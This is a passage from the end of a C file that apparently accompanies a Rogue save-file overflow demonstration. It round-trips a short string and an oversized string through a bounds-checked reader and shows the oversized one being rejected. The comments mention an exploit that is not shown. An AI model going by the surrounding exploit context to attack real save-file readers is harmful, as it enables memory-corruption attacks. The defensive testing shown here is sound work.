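    return 0;
}

/* Save s to a temp file in that format and load it back through the checked
 * reader into out; returns the reader's status (0 ok, -2 rejected). */
int roundtrip_checked(const char *s, char *out, size_t outsz)
{
    FILE *fp = tmpfile();
    if (fp == NULL) return -1;
    rogue_rand(1);                      /* reseed before writing, as the exploit does */
    write_string(s, fp);
    rewind(fp);
    rogue_rand(1);                      /* the reader must start from the same seed */
    int rc = read_string_checked(out, outsz, fp);
    fclose(fp);
    return rc;
}

char demo_buf[16];   /* constructed small buffer standing in for rogue's fixed-size array */
int main(void)
{
    printf("short: rc=%d text=%s\n", roundtrip_checked("hello", demo_buf, sizeof demo_buf), demo_buf);
    printf("oversized: rc=%d\n", roundtrip_checked("this constructed string is longer than the buffer", demo_buf, sizeof demo_buf));
    return 0;
}
```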